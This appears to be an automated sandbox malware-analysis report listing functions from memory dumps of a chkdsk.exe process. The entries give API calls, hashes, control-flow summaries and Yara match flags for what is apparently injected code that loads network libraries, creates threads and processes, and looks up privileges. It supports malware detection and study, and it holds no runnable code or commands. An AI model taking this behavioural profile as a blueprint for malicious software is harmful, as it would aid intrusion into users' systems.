                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 22c8db8535574c0f2045364536f30e76542e704df5b9e9305e28f3c342c7aa93
                    • Instruction ID: b6ed7090a82405e44da6bdfd2803f3e48a20d42b280d4dbed300fa26abb34231
                    • Opcode Fuzzy Hash: 22c8db8535574c0f2045364536f30e76542e704df5b9e9305e28f3c342c7aa93
                    • Instruction Fuzzy Hash: B790027171514402D11061998444746002597D1251FA1D422A081455CD87E588957162
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 166977cae6d98c9c41763ef6adb90adfa49e849edb76d8f310462cb10fdac789
                    • Instruction ID: 3dc15385a590e3f13264965540f6474fbe7a0623d5e3afd29c454af8f26433be
                    • Opcode Fuzzy Hash: 166977cae6d98c9c41763ef6adb90adfa49e849edb76d8f310462cb10fdac789
                    • Instruction Fuzzy Hash: 7A90027160500802D1807199444468A002597D1351FE1D026A0015658DCBA58A5D77E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 8ec1b6e54f090186806d17006df387be94faea432f756ccf9faf972bd4f360fd
                    • Instruction ID: 10eb5fd8e91db05f32704ff5950a567a72a85aba0266eaf9b114b9410e31c08b
                    • Opcode Fuzzy Hash: 8ec1b6e54f090186806d17006df387be94faea432f756ccf9faf972bd4f360fd
                    • Instruction Fuzzy Hash: 0490027160904842D14071994444A86003597D0355FA1D022A0054698D97B58D59B6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 33a6e7c2fdac6ed2762b10823e73599af2c94caf6b696e6d4121b277bca219cc
                    • Instruction ID: 50562da8bf9fc8155dd6a15506a7b0f8c2d130d1f17546f46b791b71590f8771
                    • Opcode Fuzzy Hash: 33a6e7c2fdac6ed2762b10823e73599af2c94caf6b696e6d4121b277bca219cc
                    • Instruction Fuzzy Hash: 5E90027160508802D1106199844478A002597D0351FA5D422A441465CD87E588957161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b2bb1735f544848fee05bdc1c02dc4ac2c1e237b1a8f09a49a077d768674f8bc
                    • Instruction ID: 9e7a0500bc140d2d37bb4a590f8ce00d9dd96510566336b6b5111e79df20eba0
                    • Opcode Fuzzy Hash: b2bb1735f544848fee05bdc1c02dc4ac2c1e237b1a8f09a49a077d768674f8bc
                    • Instruction Fuzzy Hash: 8790027160500842D10061994444B86002597E0351FA1D027A0114658D87A5C8557561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 12f551d21119f61e2bb491141eacf4ab881265fd43aa21176c7442c78a45cbcc
                    • Instruction ID: 5293cc23950941460ad30f54c69f14cd78de7876b36b9447a04fcf3d6a6b297e
                    • Opcode Fuzzy Hash: 12f551d21119f61e2bb491141eacf4ab881265fd43aa21176c7442c78a45cbcc
                    • Instruction Fuzzy Hash: 2E9002B160500402D14071994444786002597D0351FA1D022A5054558E87E98DD976A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 92e9b50122fd6146b3b2e10f21ddc62351a501f88aebde6eb38057b07356ce2d
                    • Instruction ID: 5d2159928a4b0416a78513b06eead062bf119933b37a1d5192789c8902bfbf92
                    • Opcode Fuzzy Hash: 92e9b50122fd6146b3b2e10f21ddc62351a501f88aebde6eb38057b07356ce2d
                    • Instruction Fuzzy Hash: 439002A174500442D10061994454B460025D7E1351FA1D026E1054558D87A9CC567166
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c94e176b59a70660a0636ec44466e8246dc7ec5fde6c39455f56edd8c7abe5a0
                    • Instruction ID: 5b28e9056caeb1623faf8bd41d3967acf41f8cd678a7b4d7297bec4d65b1ad77
                    • Opcode Fuzzy Hash: c94e176b59a70660a0636ec44466e8246dc7ec5fde6c39455f56edd8c7abe5a0
                    • Instruction Fuzzy Hash: 9E90027160500413D11161994544747002997D0291FE1D423A041455CD97E68956B161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2dd6a074d688dead63ff2d0505f73a78b44ff5ae2a2ea4dc41aab10487d32fb6
                    • Instruction ID: 3864edc09c19d1260a7d3928aac017ee3b640f5d1d54eb9387e26d972524ee3b
                    • Opcode Fuzzy Hash: 2dd6a074d688dead63ff2d0505f73a78b44ff5ae2a2ea4dc41aab10487d32fb6
                    • Instruction Fuzzy Hash: F3900261646041525545B19944445474026A7E02917E1D023A1404954C86B6985AE661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0bc6ee8fde4a033c0db61850d230ac789485bc45d9b43e0012233db2ad0db70c
                    • Instruction ID: fa6765da9fdaa86d02461a29d57f70c6155a547bd926d2f427a8eddc669ab173
                    • Opcode Fuzzy Hash: 0bc6ee8fde4a033c0db61850d230ac789485bc45d9b43e0012233db2ad0db70c
                    • Instruction Fuzzy Hash: DF90026161580042D20065A94C54B47002597D0353FA1D126A0144558CCAA588656561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00989077 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 81sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 244 989077-9890af 245 9890bb-9890c2 244->245 246 9890b6 call 98bd40 244->246 247 9890c8-989118 call 98be10 call 97acf0 call 984e50 245->247 248 98919c-9891a2 245->248 246->245 255 989120-989131 Sleep 247->255 256 989133-989139 255->256 257 989196-98919a 255->257 258 98913b-989161 call 988ca0 256->258 259 989163-989184 call 988eb0 256->259 257->248 257->255 262 989189-98918c 258->262 259->262 262->257
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00989128
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: U$net.dll$wininet.dll
                    • API String ID: 3472027048-3063254571
                    • Opcode ID: ceff191e0f39d9d7548de005ae714a66bbe4a2170b7cb62d544ff29d1ecda0bf
                    • Instruction ID: 5a7b306772ca05a1b9265dff2976a9211752280567709e2b0f6653eb48436481
                    • Opcode Fuzzy Hash: ceff191e0f39d9d7548de005ae714a66bbe4a2170b7cb62d544ff29d1ecda0bf
                    • Instruction Fuzzy Hash: FA3191B2A04641BBC714EF64CC89B6BB7B8AB88B04F14801DF62D5B386D774A550CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00989080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 264 989080-9890c2 call 98bd40 267 9890c8-989118 call 98be10 call 97acf0 call 984e50 264->267 268 98919c-9891a2 264->268 275 989120-989131 Sleep 267->275 276 989133-989139 275->276 277 989196-98919a 275->277 278 98913b-989161 call 988ca0 276->278 279 989163-989184 call 988eb0 276->279 277->268 277->275 282 989189-98918c 278->282 279->282 282->277
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00989128
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                    • Instruction ID: 522d1f0e656d98a865b9db498f06d985ab1129dc555d8e90e51f2d8144dad114
                    • Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                    • Instruction Fuzzy Hash: B2316FB2504645BBC724EF64C889F67B7B8BB88B00F14851DF62A6B245DB34A650CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 293 98a662-98a665 294 98a622-98a62d 293->294 295 98a667-98a686 293->295 296 98a68c-98a6a1 RtlFreeHeap 295->296 297 98a687 call 98af60 295->297 297->296
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973AF8), ref: 0098A69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: d31173c4ca67f2789b202eec48985821e41c06c1604bf97a5c90593ffe46ea94
                    • Instruction ID: 1c5f1b102ce54cdb07a8bcc56c916c9559298e05f99271d887c1decf8862c164
                    • Opcode Fuzzy Hash: d31173c4ca67f2789b202eec48985821e41c06c1604bf97a5c90593ffe46ea94
                    • Instruction Fuzzy Hash: C0F09AB12042046FDB08EFA8DC46EA737A8EF88754F154599F94997242D632E821CAA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 299 98a670-98a6a1 call 98af60 RtlFreeHeap
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973AF8), ref: 0098A69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: 38a9e8034b7255c59a01c7aeb00b3c75015277af5c1f5c22b343de18f3a4afe9
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: D2E012B1200208ABDB18EF99CC49EA777ACEF88750F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00978309 Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 302 978309-97831f 303 978328-97835a call 98ca00 call 97acf0 call 984e50 302->303 304 978323 call 98be60 302->304 311 97838e-978392 303->311 312 97835c-97836e PostThreadMessageW 303->312 304->303 313 978370-97838b call 97a480 PostThreadMessageW 312->313 314 97838d 312->314 313->314 314->311
                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0097836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0097838B
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: 0c07ca6d561cbc13e1d0ca8054e80bf43c818137af7cb6f9dcc269c8ba9bb810
                    • Instruction ID: 35c425030b00d938955f07d7346755a0fb85b87d939a9258d4f2f93397de877d
                    • Opcode Fuzzy Hash: 0c07ca6d561cbc13e1d0ca8054e80bf43c818137af7cb6f9dcc269c8ba9bb810
                    • Instruction Fuzzy Hash: 8101D872A802287AE721A6549C47FFE7B6C5B81F50F044159FB08FA1C2EAA5690643F5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00978310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0097836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0097838B
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction ID: 51297bbe79b4a5365d8e3cbf74b695a706c610c111ef93bd833ebfe02638c70a
                    • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction Fuzzy Hash: E5018432A8022876E721A6949C47FBE776C5B80F50F054114FF08BA1C2EAA4690647F6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 009891FD Relevance: 1.6, APIs: 1, Instructions: 117threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 527 9891fd-9891fe 528 989200-989216 527->528 529 9891b5 527->529 532 989218-989221 528->532 533 989233-98923a 528->533 530 9891bf-9891cb 529->530 531 9891b7-9891be 529->531 536 9891d1-9891d8 530->536 537 9891cc call 984e50 530->537 531->530 532->533 538 989223-98922a 532->538 534 98931d-989320 533->534 535 989240-989309 call 98bde0 * 2 call 98c0b0 call 98bde0 call 98c0b0 call 98bde0 * 2 533->535 535->534 558 98930b-989314 535->558 539 9891da-9891f6 call 98f232 CreateThread 536->539 540 9891f7-9891fc 536->540 537->536 538->535 542 98922c 538->542 542->533 558->534 559 989316 558->559 559->534
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0097F050,?,?,00000000), ref: 009891EC
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 9a0170185c0a4a3a8923a2e002a0a9d1954acb4c82b0f1228da01d3994156eab
                    • Instruction ID: bd05b112a7314cc94888617021a0ffe7faa61ddf79b392cbce6dd2649cefb7d8
                    • Opcode Fuzzy Hash: 9a0170185c0a4a3a8923a2e002a0a9d1954acb4c82b0f1228da01d3994156eab
                    • Instruction Fuzzy Hash: D8418EB2600705BBD728EF64CC86FE7B3ADAF84754F084519F529A6281DB70B910CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A775 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0097F1D2,0097F1D2,?,00000000,?,?), ref: 0098A800
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: d3119b5c73f54f3ba433edfa66199bd4a4ef9ced07f66cce4e82a4cdb5906f48
                    • Instruction ID: 7398fb05aed0898425802372c36a06576eef14bda2c3781a70efd5472e393c10
                    • Opcode Fuzzy Hash: d3119b5c73f54f3ba433edfa66199bd4a4ef9ced07f66cce4e82a4cdb5906f48
                    • Instruction Fuzzy Hash: 3F11A1B52002486FDB10DF69DC41FEB3BA8EF89754F11828AFA0C97242C530E814CBB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0097ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0097AD62
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: 80b961271b7123437e2168619b3c9bf36ed877748772c33ed68eab7ee4668e45
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 8D011EB6D0020DABDF10EAA4DC42FDDB3789B94308F108595A90D97681F631EB148B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0098A734
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: 37f53952dd154f60d20cff611de0b84638269bf66c222cc4ef2e957dde82c40a
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: 1F01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0097F6C7 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00978D14,?), ref: 0097F6FB
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: c0e6240d4f4ac3b4a7ec792f104f2f1a853901e7efa96a31c1a5bc458cb13744
                    • Instruction ID: 069c2584beb29c05cbbc92bd596a41f108a6211e684dfd18c15537176cccf41b
                    • Opcode Fuzzy Hash: c0e6240d4f4ac3b4a7ec792f104f2f1a853901e7efa96a31c1a5bc458cb13744
                    • Instruction Fuzzy Hash: 81F0522320530A6BEB10EB60DC13FAA7B88DB81780F0D45B9F80DDB283E829E600C341
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 009891B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0097F050,?,?,00000000), ref: 009891EC
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                    • Instruction ID: 2884808204849e850430a19a60d93d676cfb34e5602a8a493a24184bb8e9e072
                    • Opcode Fuzzy Hash: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                    • Instruction Fuzzy Hash: 20E06D773802043AE2207599AC02FA7B29C9B81B20F15002AFA0DEA2C1D995F80142A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(00984536,?,00984CAF,00984CAF,?,00984536,?,?,?,?,?,00000000,00000000,?), ref: 0098A65D
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: ddbdcdf613e063e51f3523ca0641fc2d205429677cd4fa8f72849019900cc534
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: A1E012B1200208ABDB14EF99CC41EA777ACEF88654F118559BA085B242C630F9108BB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0097F1D2,0097F1D2,?,00000000,?,?), ref: 0098A800
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: 9d86a6a2cb84701a657daa78fbb4904f5aaa89e46708e1535974f8aab14461b3
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: 38E01AB12002086BDB10EF49CC85EE737ADEF88650F118155BA0857241C934E8108BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

